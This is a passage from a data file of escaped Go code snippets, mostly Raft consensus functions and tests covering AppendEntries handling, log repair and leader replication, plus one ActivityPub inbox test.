request.prevLogTerm == myLastIndexTerm && request.prevLogIndex == myLastIndex { //log is consistent till now\n\t\t\t\t\t//fmt.Println(\"Log is consistent till now! Going to append new entry\")\n\t\t\t\t\tr.AppendToLog_Follower(request) //append to log\n\t\t\t\t\t//fmt.Println(r.myId(), \"Appended to log,sending true for\", string(request.entries))\n\t\t\t\t\tr.currentTerm = request.term\n\t\t\t\t\tappEntriesResponse.success = true\n\t\t\t\t\tappEntriesResponse.isHeartBeat = false\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tappEntriesResponse.term = r.currentTerm\n\tappEntriesResponse.lastLogIndex = r.myMetaData.lastLogIndex\n\t//fmt.Println(\"Response sent by\", r.Myconfig.Id, \"is :\", appEntriesResponse.success, \"to\", request.leaderId)\n\n\t//fmt.Printf(\"Follower %v sent the AE_ack to %v \\n\", r.Myconfig.Id, request.leaderId)\n\t//Where is it sending to leader's channel??--Added\n\tsend(request.leaderId, appEntriesResponse)\n}", "func sendAppendEntries(s *Sailor, peer string) error {\n\tam := appendMessage{}\n\tam.Term = s.currentTerm\n\tam.LeaderId = s.client.NodeName\n\tam.PrevLogIndex = s.leader.nextIndex[peer] - 1\n\t// This is just some fancy logic to check for the bounds on the log\n\t// e.g. our log has 0 entries, so the prevEntryTerm cannot be pulled from the log\n\tif len(s.log) == 0 {\n\t\tam.PrevLogTerm = 0\n\t\tam.Entries = nil\n\t} else {\n\t\t// If our log is too short to have prevTerm, use 0\n\t\tif int(s.leader.nextIndex[peer])-2 < 0 {\n\t\t\tam.PrevLogTerm = 0\n\t\t} else {\n\t\t\tam.PrevLogTerm = s.log[s.leader.nextIndex[peer]-2].Term\n\t\t}\n\t\t// If our nextIndex is a value we don't have yet, send nothing\n\t\tif s.leader.nextIndex[peer] > uint(len(s.log)) {\n\t\t\tam.Entries = []entry{}\n\t\t} else {\n\t\t\tam.Entries = s.log[s.leader.nextIndex[peer]-1:]\n\t\t}\n\t}\n\n\tam.LeaderCommit = s.volatile.commitIndex\n\tap := messages.Message{}\n\tap.Type = \"appendEntries\"\n\tap.ID = 0\n\tap.Source = s.client.NodeName\n\tap.Value = makePayload(am)\n\treturn s.client.SendToPeer(ap, peer)\n}", "func TestPostInbox_Accept_AcceptFollowAddsToFollowersIfOwned(t *testing.T) {\n\tapp, _, fedApp, _, fedCb, _, _, p := NewPubberTest(t)\n\tresp := httptest.NewRecorder()\n\treq := ActivityPubRequest(httptest.NewRequest(\"POST\", testInboxURI, bytes.NewBuffer(MustSerialize(testAcceptFollow))))\n\tfedApp.unblocked = func(c context.Context, actorIRIs []url.URL) error {\n\t\treturn nil\n\t}\n\tgotOwns := 0\n\tvar ownsIRI url.URL\n\tapp.owns = func(c context.Context, id url.URL) bool {\n\t\tgotOwns++\n\t\townsIRI = id\n\t\treturn true\n\t}\n\tgotGet := 0\n\tvar getIRI url.URL\n\tapp.get = func(c context.Context, id url.URL) (PubObject, error) {\n\t\tgotGet++\n\t\tgetIRI = id\n\t\tsallyActor := &vocab.Person{}\n\t\tsallyActor.SetInboxAnyURI(*sallyIRIInbox)\n\t\tsallyActor.SetId(*sallyIRI)\n\t\tsallyActor.SetFollowingCollection(&vocab.Collection{})\n\t\treturn sallyActor, nil\n\t}\n\tgotSet := 0\n\tvar setObject PubObject\n\tapp.set = func(c context.Context, o PubObject) error {\n\t\tgotSet++\n\t\tsetObject = o\n\t\treturn nil\n\t}\n\tfedCb.accept = func(c context.Context, s *streams.Accept) error {\n\t\treturn nil\n\t}\n\texpectedFollowing := &vocab.Collection{}\n\texpectedFollowing.AddItemsObject(samActor)\n\thandled, err := p.PostInbox(context.Background(), resp, req)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t} else if !handled {\n\t\tt.Fatalf(\"expected handled, got !handled\")\n\t} else if gotOwns != 1 {\n\t\tt.Fatalf(\"expected %d, got %d\", 1, gotOwns)\n\t} else if ownsIRI.String() != sallyIRIString {\n\t\tt.Fatalf(\"expected %s, got %s\", sallyIRIString, ownsIRI.String())\n\t} else if gotGet != 1 {\n\t\tt.Fatalf(\"expected %d, got %d\", 1, gotGet)\n\t} else if getIRI.String() != sallyIRIString {\n\t\tt.Fatalf(\"expected %s, got %s\", sallyIRIString, getIRI.String())\n\t} else if gotSet != 1 {\n\t\tt.Fatalf(\"expected %d, got %d\", 1, gotSet)\n\t} else if err := PubObjectEquals(setObject, expectedFollowing); err != nil {\n\t\tt.Fatal(err)\n\t}\n}", "func TestMsgAppRespWaitReset(t *testing.T) {\n\tsm := newTestRaft(1, []uint64{1, 2, 3}, 5, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(sm)\n\tsm.becomeCandidate()\n\tsm.becomeLeader()\n\n\t// The new leader has just emitted a new Term 4 entry; consume those messages\n\t// from the outgoing queue.\n\tsm.bcastAppend()\n\tsm.readMessages()\n\n\t// Node 2 acks the first entry, making it committed.\n\tsm.Step(pb.Message{\n\t\tFrom: 2,\n\t\tType: pb.MsgAppResp,\n\t\tIndex: 1,\n\t})\n\tif sm.raftLog.committed != 1 {\n\t\tt.Fatalf(\"expected committed to be 1, got %d\", sm.raftLog.committed)\n\t}\n\t// Also consume the MsgApp messages that update Commit on the followers.\n\tsm.readMessages()\n\n\t// A new command is now proposed on node 1.\n\tsm.Step(pb.Message{\n\t\tFrom: 1,\n\t\tType: pb.MsgProp,\n\t\tEntries: []pb.Entry{{}},\n\t})\n\n\t// The command is broadcast to all nodes not in the wait state.\n\t// Node 2 left the wait state due to its MsgAppResp, but node 3 is still waiting.\n\tmsgs := sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"expected 1 message, got %d: %+v\", len(msgs), msgs)\n\t}\n\tif msgs[0].Type != pb.MsgApp || msgs[0].To != 2 {\n\t\tt.Errorf(\"expected MsgApp to node 2, got %v to %d\", msgs[0].Type, msgs[0].To)\n\t}\n\tif len(msgs[0].Entries) != 1 || msgs[0].Entries[0].Index != 2 {\n\t\tt.Errorf(\"expected to send entry 2, but got %v\", msgs[0].Entries)\n\t}\n\n\t// Now Node 3 acks the first entry. This releases the wait and entry 2 is sent.\n\tsm.Step(pb.Message{\n\t\tFrom: 3,\n\t\tType: pb.MsgAppResp,\n\t\tIndex: 1,\n\t})\n\tmsgs = sm.readMessages()\n\tif len(msgs) != 1 {\n\t\tt.Fatalf(\"expected 1 message, got %d: %+v\", len(msgs), msgs)\n\t}\n\tif msgs[0].Type != pb.MsgApp || msgs[0].To != 3 {\n\t\tt.Errorf(\"expected MsgApp to node 3, got %v to %d\", msgs[0].Type, msgs[0].To)\n\t}\n\tif len(msgs[0].Entries) != 1 || msgs[0].Entries[0].Index != 2 {\n\t\tt.Errorf(\"expected to send entry 2, but got %v\", msgs[0].Entries)\n\t}\n}", "func TestLeaderStartReplication(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\n\tents := []pb.Entry{{Data: []byte(\"some data\")}}\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: ents})\n\n\tif g := r.raftLog.lastIndex(); g != li+1 {\n\t\tt.Errorf(\"lastIndex = %d, want %d\", g, li+1)\n\t}\n\tif g := r.raftLog.committed; g != li {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %+v, want %+v\", msgs, wmsgs)\n\t}\n\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"ents = %+v, want %+v\", g, wents)\n\t}\n}", "func (sm *State_Machine) FollTesting(t *testing.T) {\n\n\t//Creating a follower which has just joined the cluster.\n\tvar follTC TestCases\n\tfollTC.t = t\n\tvar cmdReq = []string{\"read test\", \"read cs733\"}\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:2|LoggIng:1|votedFor:0|commitInd:0|>>>\n\n\t/*Sending an apped request*/\n\tfollTC.req = Append{Data: []byte(cmdReq[0])}\n\tfollTC.respExp = Commit{Data: []byte(\"5000\"), Err: []byte(\"I'm not leader\")}\n\tsm.ClientCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending appendEntry request*/\n\t//Suppose leader and follower are at same Term.\n\tentries1 := Logg{Logg: []MyLogg{{1, \"read test\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 0, PreLoggTerm: 2, Logg: entries1, LeaderCom: 0}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 1, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 0}\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting LogStore\n\tfollTC.respExp = Alarm{T: 0}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:1|LoggInd:1|votedFor:0|commitInd:0|lastApp:0|>>>\n\n\t//Sending Multiple entries\n\tentries2 := Logg{Logg: []MyLogg{{1, \"read test\"}, {1, \"read cloud\"}, {1, \"read cs733\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 0, PreLoggTerm: 1, Logg: entries2, LeaderCom: 1}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 1, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:1|LoggInd:3|votedFor:0|commitInd:1|lastApp:0|>>>\n\n\t//Suppose leader has higher Term than follower.\n\tentries3 := Logg{Logg: []MyLogg{{1, \"read cs733\"}, {2, \"delete test\"}}}\n\tfollTC.req = AppEntrReq{Term: 2, LeaderId: 5000, PreLoggInd: 2, PreLoggTerm: 1, Logg: entries3, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:2|LoggIng:4|votedFor:0|commitInd:2|lastApp:0|>>>\n\n\t//Suppose follower has higher Term than leader.\n\tentries4 := Logg{Logg: []MyLogg{{1, \"read cs733\"}, {2, \"delete test\"}}}\n\tfollTC.req = AppEntrReq{Term: 1, LeaderId: 5000, PreLoggInd: 2, PreLoggTerm: 2, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Suppose prevIndex does not matches.\n\tentries4 = Logg{Logg: []MyLogg{{3, \"append test\"}, {3, \"cas test\"}}}\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 5, PreLoggTerm: 3, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Suppose prevIndex matches, but entry doesnt.\n\tentries4 = Logg{Logg: []MyLogg{{3, \"append test\"}, {3, \"cas test\"}}}\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 3, PreLoggTerm: 3, Logg: entries4, LeaderCom: 2}\n\tfollTC.respExp = Send{PeerId: 5000, Event: AppEntrResp{Term: 2, Succ: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.respExp = Alarm{T: 200}\n\tfollTC.expect()\n\n\t//Everything is ok, but no entry.\n\tfollTC.req = AppEntrReq{Term: 3, LeaderId: 5000, PreLoggInd: 3, PreLoggTerm: 3, LeaderCom: 2}\n\tfollTC.respExp = Alarm{T: 200}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending vote request*/\n\t//sending vote request with lower Term.\n\tfollTC.req = VoteReq{Term: 1, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 2, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with not updated Logg.\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 1, PreLoggTerm: 1}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 2, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//sending vote request with not updated Logg.\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 5, PreLoggTerm: 4}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 3, VoteGrant: true}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t//<<<|Id:1000|Status:follower|CurrTerm:3|LoggIng:4|votedFor:1|commitInd:2|lastApp:0|>>>\n\n\t//checking against duplicate vote rquest\n\tfollTC.req = VoteReq{Term: 3, CandId: 2000, PreLoggInd: 5, PreLoggTerm: 4}\n\tfollTC.respExp = Send{PeerId: 2000, Event: VoteResp{Term: 3, VoteGrant: false}}\n\tsm.NetCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.expect()\n\n\t/*Sending timeout*/\n\tfollTC.req = Timeout{}\n\tfollTC.respExp = Alarm{T: 150}\n\tsm.TimeoutCh <- follTC.req\n\tsm.EventProcess()\n\tfollTC.resp = <-sm.ActionCh //expecting alarm signal\n\tfollTC.expect()\n\tfollTC.resp = <-sm.ActionCh\n\tfollTC.respExp = Send{PeerId: 0, Event: VoteReq{Term: 4, CandId: 1000, PreLoggInd: 3, PreLoggTerm: 2}} //also the vote request\n\tfollTC.expect()\n\n}", "func (r *raft) appendEntriesReceiver(p *AppendEntries) (*AppendEntriesResults, error) {\n\tif p.Term < r.currentTerm {\n\t\treturn &AppendEntriesResults{Term: r.currentTerm, Success: false}, nil\n\t}\n\n\tlastIndex, err := r.log.LastIndex()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif lastIndex < p.PrevLogIndex {\n\t\treturn &AppendEntriesResults{Term: r.currentTerm, Success: false}, nil\n\t}\n\tentries, err := r.log.Read(p.PrevLogIndex, p.PrevLogIndex+1)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif entries[0].Term != p.PrevLogTerm {\n\t\treturn &AppendEntriesResults{Term: r.currentTerm, Success: false}, nil\n\t}\n\t// 3. If an existing entry conflicts with a new one(same index but different terms),\n\t// delete the existing entry and all that follow\n\t// 4. Append any new entries not alredy in the log\n\t// TODO: just overwrite directly, is it most efficient?\n\t//r.log = append(r.log[:p.PrevLogIndex], p.Entries...)\n\tif err := r.log.Write(p.PrevLogIndex+1, p.Entries); err != nil {\n\t\treturn nil, err\n\t}\n\n\tif p.LeaderCommit > r.commitIndex {\n\t\t// attention: the log's last index has been updated\n\t\tlastIndex, err := r.log.LastIndex()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tr.commitIndex = min(p.LeaderCommit, lastIndex)\n\t\t// TODO:apply the new committed log to state machine\n\t\t// and update lastApplied\n\t\tentries, err = r.log.Read(r.lastApplied+1, r.commitIndex+1)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\t// TODO: need save lastApplied to file as currentTerm and votedFor ?\n\t\tr.applier.Apply(entries)\n\t\tr.votedFor = p.LeaderId\n\t\tr.lastApplied = r.commitIndex\n\t}\n\tr.currentTerm = p.Term\n\treturn &AppendEntriesResults{Term: r.currentTerm, Success: true}, nil\n}", "func TestStartAsFollower(t *testing.T) {\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tif r.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", r.state, StateFollower)\n\t}\n}", "func (s *server) processAppendEntriesResponse(resp *AppendEntriesResponse) {\n\t// If we find a higher term then change to a follower and exit.\n\tif resp.Term() > s.Term() {\n\t\ts.updateCurrentTerm(resp.Term(), \"\")\n\t\treturn\n\t}\n\n\t// panic response if it's not successful.\n\tif !resp.Success() {\n\t\treturn\n\t}\n\n\t// if one peer successfully append a log from the leader term,\n\t// we add it to the synced list\n\tif resp.append == true {\n\t\tfmt.Println(s.syncedPeer)\n\t\tfmt.Println(resp.peer, \"->\", s.syncedPeer[resp.peer])\n\t\ts.syncedPeer[resp.peer] = true\n\t\tfmt.Println(resp.peer, \"->\", s.syncedPeer[resp.peer])\n\t}\n\n\t// Increment the commit count to make sure we have a quorum before committing.\n\tif len(s.syncedPeer) < s.QuorumSize() {\n\t\treturn\n\t}\n\n\t// Determine the committed index that a majority has.\n\tvar indices []uint64\n\tindices = append(indices, s.log.currentIndex())\n\tfor _, peer := range s.peers {\n\t\tindices = append(indices, peer.getPrevLogIndex())\n\t}\n\tsort.Sort(sort.Reverse(uint64Slice(indices)))\n\n\t// We can commit up to the index which the majority of the members have appended.\n\tcommitIndex := indices[s.QuorumSize()-1]\n\tcommittedIndex := s.log.commitIndex\n\n\tif commitIndex > committedIndex {\n\t\t// leader needs to do a fsync before committing log entries\n\t\ts.log.sync()\n\t\ts.log.setCommitIndex(commitIndex)\n\t\ts.debugln(\"commit index \", commitIndex)\n\t}\n}", "func (rf *Raft) buildAppendEntriesReplyWhenNotSuccess(reply *AppendEntriesReply, PrevLogIndex int, PrevLogTerm int) {\n\tif PrevLogIndex > rf.getLastIndex() {\n\t\t// this raft do not know about the PrevLogIndex\n\t\treply.SuggestPrevLogIndex = rf.getLastIndex()\n\t\treply.SuggestPrevLogTerm = rf.getLastTerm()\n\t} else {\n\t\t// there is conflict!\n\t\tConflictTerm := rf.getTermForIndex(PrevLogIndex)\n\t\tAssertF(ConflictTerm != PrevLogTerm, \"\")\n\t\tAssertF(PrevLogIndex > rf.commitIndex, \"\")\n\n\t\t// TODO: change to (ConflictTerm, FirstIndex)\n\t\tif ConflictTerm > PrevLogTerm {\n\t\t\t// T1 -- PrevLogTerm, T2 -- ConflictTerm, T1<T2\n\t\t\t// any (i1,t1) in leaders log, if i1<=PrevLogIndex, then t1<=PrevLogTerm\n\t\t\t// Then we find SuggestPrevLogIndex, in tuple (SuggestPrevLogIndex, t2),\n\t\t\t// that satisfies t2<=T1, and SuggestPrevLogIndex is the large one\n\t\t\t// suggestTerm = the max index ( <= PrevLogTerm )\n\t\t\treply.SuggestPrevLogIndex = PrevLogIndex\n\t\t\tfor ; reply.SuggestPrevLogIndex > rf.commitIndex && rf.getTermForIndex(reply.SuggestPrevLogIndex) > PrevLogTerm; reply.SuggestPrevLogIndex-- {\n\t\t\t}\n\t\t\treply.SuggestPrevLogTerm = rf.getTermForIndex(reply.SuggestPrevLogIndex) // term 0 if index 0\n\t\t} else {\n\t\t\treply.SuggestPrevLogIndex = PrevLogIndex - 1\n\t\t\treply.SuggestPrevLogTerm = rf.getTermForIndex(reply.SuggestPrevLogIndex) // term 0 if index 0\n\t\t}\n\n\t\tAssertF(reply.SuggestPrevLogIndex >= rf.commitIndex,\n\t\t\t\"reply.SuggestPrevLogIndex {%d} >= rf.commitIndex {%d}\",\n\t\t\treply.SuggestPrevLogIndex, rf.commitIndex)\n\t}\n\tAssertF(reply.SuggestPrevLogIndex < PrevLogIndex,\n\t\t\"reply.SuggestPrevLogIndex {%d} < PrevLogIndex {%d}\",\n\t\treply.SuggestPrevLogIndex, PrevLogIndex)\n}", "func updateLastAppended(s *followerReplication, req *pb.AppendEntriesRequest) {\n\t// Mark any inflight logs as committed\n\tif logs := req.Entries; len(logs) > 0 {\n\t\tlast := logs[len(logs)-1]\n\t\tatomic.StoreUint64(&s.nextIndex, last.Index+1)\n\t\ts.commitment.match(s.peer.ID, last.Index)\n\t}\n\n\t// Notify still leader\n\ts.notifyAll(true)\n}", "func (r *Raft) AppendEntry(msg string) int {\n\tr.Log = append(r.Log, fmt.Sprintf(\"%d,%s\", r.CurrentTerm, msg))\n\treturn r.GetLastLogIndex()\n}", "func (r *Raft) LogRepair(response AppendEntriesResponse) {\n\tid := response.followerId\n\t//fmt.Println(\"In log repair for \", id)\n\tfailedIndex := r.myMetaData.nextIndexMap[id]\n\tvar nextIndex int\n\t//fmt.Println(\"Failed index is:\", failedIndex)\n\tif failedIndex != 0 {\n\t\tnextIndex = failedIndex - 1 //decrementing follower's nextIndex\n\n\t} else { //if nextIndex is 0 means, follower doesn't have first entry (of leader's log),so decrementing should not be done, so retry the same entry again!\n\t\tnextIndex = failedIndex\n\t}\n\t//Added--3:38-23 march\n\tr.myMetaData.nextIndexMap[id] = nextIndex\n\t//fmt.Println(\"I am\", response.followerId, \"My Old and new NI are\", failedIndex, nextIndex)\n\treturn\n}", "func (r *Raft) LogRepair(response AppendEntriesResponse) {\n\tId := response.FollowerId\n\tfailedIndex := r.f_specific[Id].nextIndex\n\tvar nextIndex int\n\tif failedIndex != 0 {\n\t\tif response.LastLogIndex < r.MyMetaData.LastLogIndex { //==CHECK\n\t\t\tnextIndex = response.LastLogIndex + 1\n\t\t} else {\n\t\t\tnextIndex = failedIndex - 1 //decrementing follower's nextIndex\n\t\t\t//nextIndex = response.LastLogIndex + 1 //changed on 12 march--failing for some cases --CHECK, doesn't work with for loop in handleClient\n\t\t}\n\t} else { //if nextIndex is 0 means, follower doesn't have first entry (of leader's log),so decrementing should not be done, so retry the same entry again!\n\t\tnextIndex = failedIndex\n\t}\n\tr.f_specific[Id].nextIndex = nextIndex\n\treturn\n}", "func (rf *Raft) AppendEntry(args AppendEntryArgs, reply *AppendEntryReply) {\n\t// Your code here.\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tif args.Term < rf.currentTerm {\n\t\treply.Success = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\trf.state = FOLLOWER\n\trf.currentTerm = args.Term\n\trf.votedFor = -1\n\treply.Term = args.Term\n\n\tif args.PrevLogIndex >= 0 &&\n\t\t(len(rf.log)-1 < args.PrevLogIndex ||\n\t\t\trf.log[args.PrevLogIndex].Term != args.PrevLogTerm) {\n\t\treply.Success = false\n\t\treply.CommitIndex = min(len(rf.log)-1, args.PrevLogIndex)\n\t\tfor reply.CommitIndex >= 0 &&\n\t\t\trf.log[reply.CommitIndex].Term != args.PrevLogTerm {\n\t\t\treply.CommitIndex--\n\t\t}\n\t} else if args.Entries != nil {\n\t\trf.log = append(rf.log[:args.PrevLogIndex+1], args.Entries...)\n\t\tif len(rf.log) > args.LeaderCommit {\n\t\t\trf.commitIndex = args.LeaderCommit\n\t\t\t//TODO:commitlog\n\t\t\tgo rf.CommitLog()\n\t\t}\n\t\treply.CommitIndex = len(rf.log) - 1\n\t\treply.Success = true\n\t} else {\n\t\tif len(rf.log) > args.LeaderCommit {\n\t\t\trf.commitIndex = args.LeaderCommit\n\t\t\t//TODO:commitlog\n\t\t\tgo rf.CommitLog()\n\t\t}\n\t\treply.CommitIndex = args.PrevLogIndex\n\t\treply.Success = true\n\t}\n\trf.persist()\n\trf.timer.Reset(properTimeDuration(rf.state))\n}", "func (rf *Raft) correctPrevLogEntry(PrevLogIndex int, PrevLogTerm int) bool {\n\t// if no log, have to check lastIncludedIndex and lastIncludedTerm\n\tif len(rf.log) == 0 {\n\t\treturn PrevLogIndex == rf.lastIncludedIndex && PrevLogTerm == rf.lastIncludedTerm\n\t}\n\tprevRaftLogIndex := rf.getTrimmedLogIndex(PrevLogIndex)\n\t// the leader nextIndex is ahead of us\n\tif prevRaftLogIndex >= len(rf.log) {\n\t\treturn false\n\t}\n\n\t// NOTE:\n\t// if prevRaftLogIndex == -1 ... this should never happen?\n\t// We know length of rf.log > 0 (see where this function is called), so this\n\t// would only occur if leader nextIndex for this server preceded our snapshot;\n\t// but on leader election, nextIndex is set to the end of the leader log,\n\t// including all committed entries.\n\t// However, our snapshot includes AT MOST all committed entries,\n\t// so nextIndex should never precede it.\n\tif prevRaftLogIndex == -1 && len(rf.log) > 0 {\n\t\trf.Log(LogInfo, \"AppendEntries call has PrevLogIndex preceding our log!\")\n\t\treturn true\n\t}\n\n\t// we must have an entry at the given index (see above note for why\n\t// PrevLogIndex will never precede our snapshot), so just return a bool for whether\n\t// or not the term of this entry is correct\n\treturn rf.log[prevRaftLogIndex].Term == PrevLogTerm\n\n}", "func (s *server) processAppendEntriesRequest(req *AppendEntriesRequest) (*AppendEntriesResponse, bool) {\n\ts.traceln(\"server.ae.process\")\n\n\tif req.Term < s.currentTerm {\n\t\ts.debugln(\"server.ae.error: stale term\")\n\t\treturn newAppendEntriesResponse(s.currentTerm, false, s.log.currentIndex(), s.log.CommitIndex()), false\n\t}\n\n\tif req.Term == s.currentTerm {\n\t\t// change state to follower\n\t\ts.state = Follower\n\t\t// discover new leader when candidate\n\t\t// save leader name when follower\n\t\ts.leader = req.LeaderName\n\t} else {\n\t\t// Update term and leader.\n\t\ts.updateCurrentTerm(req.Term, req.LeaderName)\n\t}\n\n\t// Reject if log doesn't contain a matching previous entry.\n\tif err := s.log.truncate(req.PrevLogIndex, req.PrevLogTerm); err != nil {\n\t\ts.debugln(\"server.ae.truncate.error: \", err)\n\t\treturn newAppendEntriesResponse(s.currentTerm, false, s.log.currentIndex(), s.log.CommitIndex()), true\n\t}\n\n\t// Append entries to the log.\n\tif err := s.log.appendEntries(req.Entries); err != nil {\n\t\ts.debugln(\"server.ae.append.error: \", err)\n\t\treturn newAppendEntriesResponse(s.currentTerm, false, s.log.currentIndex(), s.log.CommitIndex()), true\n\t}\n\n\t// Commit up to the commit index.\n\tif err := s.log.setCommitIndex(req.CommitIndex); err != nil {\n\t\ts.debugln(\"server.ae.commit.error: \", err)\n\t\treturn newAppendEntriesResponse(s.currentTerm, false, s.log.currentIndex(), s.log.CommitIndex()), true\n\t}\n\n\t// once the server appended and committed all the log entries from the leader\n\n\treturn newAppendEntriesResponse(s.currentTerm, true, s.log.currentIndex(), s.log.CommitIndex()), true\n}", "func TestLeaderCommitEntry(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tfor _, m := range r.readMessages() {\n\t\tr.Step(acceptAndReply(m))\n\t}\n\n\tif g := r.raftLog.committed; g != li+1 {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li+1)\n\t}\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"nextEnts = %+v, want %+v\", g, wents)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\tfor i, m := range msgs {\n\t\tif w := uint64(i + 2); m.To != w {\n\t\t\tt.Errorf(\"to = %x, want %x\", m.To, w)\n\t\t}\n\t\tif m.Type != pb.MsgApp {\n\t\t\tt.Errorf(\"type = %v, want %v\", m.Type, pb.MsgApp)\n\t\t}\n\t\tif m.Commit != li+1 {\n\t\t\tt.Errorf(\"commit = 